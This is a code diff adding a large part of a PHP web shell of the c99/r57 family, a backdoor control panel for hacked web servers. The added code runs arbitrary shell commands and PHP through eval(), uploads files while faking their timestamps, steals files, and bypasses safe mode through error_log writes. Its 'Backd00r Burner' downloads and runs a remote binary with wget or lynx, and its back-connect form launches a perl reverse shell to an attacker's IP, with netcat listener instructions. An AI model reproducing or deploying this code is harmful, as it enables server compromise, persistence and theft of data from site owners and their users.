+    { 
+     if ($filestealth) {$stat = stat($uploadpath.$destin);} 
+     $fp = fopen($uploadpath.$destin,"w"); 
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} 
+     else 
+     { 
+      fwrite($fp,$content,strlen($content)); 
+      fclose($fp); 
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} 
+     } 
+    } 
+   } 
+  } 
+ } 
+ if ($miniform) 
+ { 
+  echo "<b>".$uploadmess."</b>"; 
+  $act = "ls"; 
+ } 
+ else 
+ { 
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> 
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> 
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> 
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> 
+File-name (auto-fill): <input name=uploadfilename size=25><br><br> 
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> 
+<input type=submit name=submit value=\"Upload\"> 
+</form>"; 
+ } 
+} 
+if ($act == "delete") 
+{ 
+ $delerr = ""; 
+ foreach ($actbox as $v) 
+ { 
+  $result = FALSE; 
+  $result = fs_rmobj($v); 
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} 
+ } 
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} 
+ $act = "ls"; 
+} 
+if (!$usefsbuff) 
+{ 
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} 
+} 
+else 
+{ 
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } 
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} 
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actarcbuff) 
+ { 
+  $arcerr = ""; 
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} 
+  else {$ext = ".tar.gz";} 
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} 
+  $cmdline .= " ".$actarcbuff_path; 
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]); 
+  foreach($objects as $v) 
+  { 
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); 
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} 
+   if (is_dir($v)) 
+   { 
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} 
+    $v .= "*"; 
+   } 
+   $cmdline .= " ".$v; 
+  } 
+  $tmp = realpath("."); 
+  chdir($d); 
+  $ret = myshellexec($cmdline); 
+  chdir($tmp); 
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} 
+  $ret = str_replace("\r\n","\n",$ret); 
+  $ret = explode("\n",$ret); 
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   if (in_array($v,$ret)) {fs_rmobj($v);} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+} 
+if ($act == "cmd") 
+{ 
+if (trim($cmd) == "ps -aux") {$act = "processes";} 
+elseif (trim($cmd) == "tasklist") {$act = "processes";} 
+else 
+{ 
+ @chdir($chdir); 
+ if (!empty($submit)) 
+ { 
+  echo "<b>Result of execution this command</b>:<br>"; 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  $ret = myshellexec($cmd); 
+  $ret = convert_cyr_string($ret,"d","w"); 
+  if ($cmd_txt) 
+  { 
+   $rows = count(explode("\r\n",$ret))+1; 
+   if ($rows < 10) {$rows = 10;} 
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+  } 
+  else {echo $ret."<br>";} 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; 
+} 
+} 
+if ($act == "ls") 
+{ 
+ if (count($ls_arr) > 0) {$list = $ls_arr;} 
+ else 
+ { 
+  $list = array(); 
+  if ($h = @opendir($d)) 
+  { 
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} 
+   closedir($h); 
+  } 
+  else {} 
+ } 
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} 
+ else 
+ { 
+  //Building array 
+  $objects = array(); 
+  $vd = "f"; //Viewing mode 
+  if ($vd == "f") 
+  { 
+   $objects["head"] = array(); 
+   $objects["folders"] = array(); 
+   $objects["links"] = array(); 
+   $objects["files"] = array(); 
+   foreach ($list as $v) 
+   { 
+    $o = basename($v); 
+    $row = array(); 
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) {$type = "LINK";} 
+     else {$type = "DIR";} 
+     $row[] = $v; 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} 
+    $row[] = filemtime($v); 
+    if (!$win) 
+    { 
+     $ow = posix_getpwuid(fileowner($v)); 
+     $gr = posix_getgrgid(filegroup($v)); 
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); 
+    } 
+    $row[] = fileperms($v); 
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} 
+    elseif (is_link($v)) {$objects["links"][] = $row;} 
+    elseif (is_dir($v)) {$objects["folders"][] = $row;} 
+    elseif (is_file($v)) {$objects["files"][] = $row;} 
+    $i++; 
+   } 
+   $row = array(); 
+   $row[] = "<b>Name</b>"; 
+   $row[] = "<b>Size</b>"; 
+   $row[] = "<b>Modify</b>"; 
+   if (!$win) 
+  {$row[] = "<b>Owner/Group</b>";} 
+   $row[] = "<b>Perms</b>"; 
+   $row[] = "<b>Action</b>"; 
+   $parsesort = parsesort($sort); 
+   $sort = $parsesort[0].$parsesort[1]; 
+   $k = $parsesort[0]; 
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";} 
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; 
+   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; 
+   $row[$k] .= $y; 
+   for($i=0;$i<count($row)-1;$i++) 
+   { 
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} 
+   } 
+   $v = $parsesort[0]; 
+   usort($objects["folders"], "tabsort"); 
+   usort($objects["links"], "tabsort"); 
+   usort($objects["files"], "tabsort"); 
+   if ($parsesort[1] == "d") 
+   { 
+    $objects["folders"] = array_reverse($objects["folders"]); 
+    $objects["files"] = array_reverse($objects["files"]); 
+   } 
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); 
+   $tab = array(); 
+   $tab["cols"] = array($row); 
+   $tab["head"] = array(); 
+   $tab["folders"] = array(); 
+   $tab["links"] = array(); 
+   $tab["files"] = array(); 
+   $i = 0; 
+   foreach ($objects as $a) 
+   { 
+    $v = $a[0]; 
+    $o = basename($v); 
+    $dir = dirname($v); 
+    if ($disp_fullpath) {$disppath = $v;} 
+    else {$disppath = $o;} 
+    $disppath = str2mini($disppath,60); 
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} 
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} 
+    foreach ($regxp_highlight as $r) 
+    { 
+     if (ereg($r[0],$o)) 
+     { 
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} 
+      else 
+      { 
+       $r[1] = round($r[1]); 
+       $isdir = is_dir($v); 
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) 
+       { 
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} 
+        $disppath = $r[2].$disppath.$r[3]; 
+        if ($r[4]) {break;} 
+       } 
+      } 
+     } 
+    } 
+    $uo = urlencode($o); 
+    $ud = urlencode($dir); 
+    $uv = urlencode($v); 
+    $row = array(); 
+    if ($o == ".") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif ($o == "..") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) 
+     { 
+      $disppath .= " => ".readlink($v); 
+      $type = "LINK"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+     } 
+     else 
+     { 
+      $type = "DIR"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+      } 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) 
+    { 
+     $ext = explode(".",$o); 
+     $c = count($ext)-1; 
+     $ext = $ext[$c]; 
+     $ext = strtolower($ext); 
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; 
+     $row[] = view_size($a[1]); 
+    } 
+    $row[] = date("d.m.Y H:i:s",$a[2]); 
+    if (!$win) {$row[] = $a[3];} 
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; 
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} 
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} 
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} 
+    elseif (is_link($v)) {$tab["links"][] = $row;} 
+    elseif (is_dir($v)) {$tab["folders"][] = $row;} 
+    elseif (is_file($v)) {$tab["files"][] = $row;} 
+    $i++; 
+   } 
+  } 
+  // Compiling table 
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); 
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; 
+  foreach($table as $row) 
+  { 
+   echo "<tr>\r\n"; 
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";} 
+   echo "</tr>\r\n"; 
+  } 
+  echo "</table><hr size=\"1\" noshade><p align=\"right\"> 
+  <script> 
+  function ls_setcheckboxall(status) 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = status; 
+    id++; 
+   } 
+  } 
+  function ls_reverse_all() 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; 
+    id++; 
+   } 
+  } 
+  </script> 
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">  
+  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; 
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) 
+  { 
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; 
+  } 
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>"; 
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; 
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; 
+  if ($usefsbuff) 
+  { 
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; 
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; 
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; 
+  } 
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; 
+  echo "</form>"; 
+ } 
+} 
+if ($act == "tools") 
+{ 
+
+
+
+
+
+
+ ?> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Bind Functions By r57  </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center">
+    </div>
+ <form action="<?php echo $surl; ?>">
+<b>Bind With Backd00r Burner</b></br><form action="<?php echo $surl;?>"><input type=hidden name=act value=tools><select size=\"1\" name=dolma><option value="wgetcan">Use Wget</option><option value="lynxcan">Use lynx -dump</option><option value="freadcan">Use Fread</option></select></br></br><input type="submit" value="Burn it bAby"></form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+  
+ 
+   <b>Back-Connection :</b></br><form action="<?php echo $surl;?>"> <b>Ip (default is your ip) :</br> </b><input type=hidden name=act value=tools><input type="text" name="ipi" value="<?echo getenv('REMOTE_ADDR');?>"></br><b>Port:</br></b><input type="text" name="pipi" value="4392"></br><input type="submit" value="C0nnect ->"></br></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+   
+   </center>
+    </td>
+</tr></TABLE>
+ 
+ 
+ 
+ 
+ 
+
+
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>File Stealer Function Ripped fRom Tontonq 's File Stealer ... </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><b>Error_Log SAfe Mode Bypass By Psych0 ;)</b>
+    <form action="<?php echo $surl; ?>" method="POST">
+    <input type=hidden name=act value=tools>
+    <textarea name="erorr" cols=100 rows=10></textarea></br>
+    <input type="text" name="nere" value="<?echo "$real\index.php";?> "size=84>
+    <input type="submit" value="Write 2 File !!">
+    
+    </form>
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    </div>
+ 
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+   <form action="<?php echo $surl; ?>" method="POST">
+   <input type=hidden name=act value=tools>
+   Dosyanin Adresi ? = <input type="text" name="dosyaa" size="81" maxlength=500  value=""><br><br> 
+Nereya Kaydolcak? = <input type="text" name="yeniyer" size=81 maxlength=191 value="<?php echo "$real/sploitz.zip"; ?>"><br><br> 
+<input type=submit class='stealthSubmit' Value='Dosyayi Chek'> 
+</form>
+<br><br><br>
+   
+   
+   
+   
+   </center>
+   
+   </center>
+    </td>
+</tr></TABLE>
+
+
+
+
+
+
+
+
+
+
+
+
+<?php 
+
+if (isset($_POST['dosyaa']))
+{
+dosyayicek($_POST['dosyaa'],$_POST['yeniyer']);
+
+}
+if (!empty($_GET['ipi']) && !empty($_GET['pipi'])) 
+{ 
+ cf("/tmp/back",$back_connect); 
+ $p2=which("perl"); 
+ $blah = ex($p2." /tmp/back ".$_GET['ipi']." ".$_GET['pipi']." &"); 
+echo"<b>Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...</b>"; 
+} 
+if (!empty($_GET['dolma'])) 
+{  
+$sayko=htmlspecialchars($_GET['dolma']); 
+if ($sayko == "wgetcan") 
+{ 
+
+myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+
+} 
+
+else if ($sayko =="freadcan") 
+{ 
+dosyayicek($adires,"sayko_bind");
+myshellexec("./sayko_bind");
+} 
+
+else if ($sayko == "lynxcan") 
+{ 
+myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+} 
+
+
+
+
+
+} 
+
+if  (!empty($_POST['erorr'])) 
+{
+
+
+
+error_log($_POST['erorr'], 3, "php://".$_POST['nere']);
+
+
+
+}
+
+
+
+
+
+
+
+
+
+} 
+if ($act == "processes") 
+{ 
+ echo "<b>Processes:</b><br>"; 
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} 
+ else {$handler = "tasklist";} 
+ $ret = myshellexec($handler); 
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";} 
+ else 
+ { 
+  if (empty($processes_sort)) {$processes_sort = $sort_default;} 
+  $parsesort = parsesort($processes_sort); 
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} 
+  $k = $parsesort[0]; 
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  $ret = htmlspecialchars($ret); 
+  if (!$win) 
+  { 
+   if ($pid) 
+   { 
+    if (is_null($sig)) {$sig = 9;} 
+    echo "Sending signal ".$sig." to #".$pid."... "; 
+    if (posix_kill($pid,$sig)) {echo "OK.";} 
+    else {echo "ERROR.";} 
+   } 
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);} 
+   $stack = explode("\n",$ret); 
+   $head = explode(" ",$stack[0]); 
+   unset($stack[0]); 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+{ 
+ echo "<tr>"; 
+     $line = explode(" ",$line); 
+     $line[10] = join(" ",array_slice($line,10)); 
+     $line = array_slice($line,0,11); 
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} 
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; 
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  else 
+  { 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);} 
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   $stack = explode("\n",$ret); 
+   unset($stack[0],$stack[2]); 
+   $stack = array_values($stack); 
+   $head = explode("",$stack[0]); 
+   $head[1] = explode(" ",$head[1]); 
+   $head[1] = $head[1][0]; 
+   $stack = array_slice($stack,1); 
+   unset($head[2]); 
+   $head = array_values($head); 
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   if ($k > count($head)) {$k = count($head)-1;} 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+    { 
+     echo "<tr>"; 
+     $line = explode("",$line); 
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); 
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024;  
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  $head[$k] = "<b>".$head[$k]."</b>".$y; 
+  $v = $processes_sort[0]; 
+  usort($prcs,"tabsort"); 
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} 
+  $tab = array(); 
+  $tab[] = $head; 
+  $tab = array_merge($tab,$prcs); 
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; 
+  foreach($tab as $i=>$k) 
+  { 
+   echo "<tr>"; 
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} 
+   echo "</tr>"; 
+  } 
+  echo "</table>"; 
+ } 
+} 
+if ($act == "eval") 
+{ 
+ if (!empty($eval)) 
+ { 
+  echo "<b>Result of execution this PHP-code</b>:<br>"; 
+  $tmp = ob_get_contents(); 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  if ($tmp) 
+  { 
+   ob_clean(); 
+   eval($eval); 
+   $ret = ob_get_contents(); 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   ob_clean(); 
+   echo $tmp; 
+   if ($eval_txt) 
+   { 
+    $rows = count(explode("\r\n",$ret))+1; 
+    if ($rows < 10) {$rows = 10;} 
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+   } 
+   else {echo $ret."<br>";} 
+  } 
+  else 
+  { 
+   if ($eval_txt) 
+   { 
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; 
+    eval($eval); 
+    echo "</textarea>"; 
+   } 
+   else {echo $ret;} 
+  } 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; 
+} 
+if ($act == "f") 
+{ 
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") 
+ { 
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} 
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} 
+ } 
+ else 
+ { 
+  $r = @file_get_contents($d.$f); 
+  $ext = explode(".",$f); 
+  $c = count($ext)-1; 
+  $ext = $ext[$c]; 
+  $ext = strtolower($ext); 
+  $rft = ""; 
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} 
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} 
+  if (empty($ft)) {$ft = $rft;} 
+  $arr = array( 
+   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), 
+   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), 
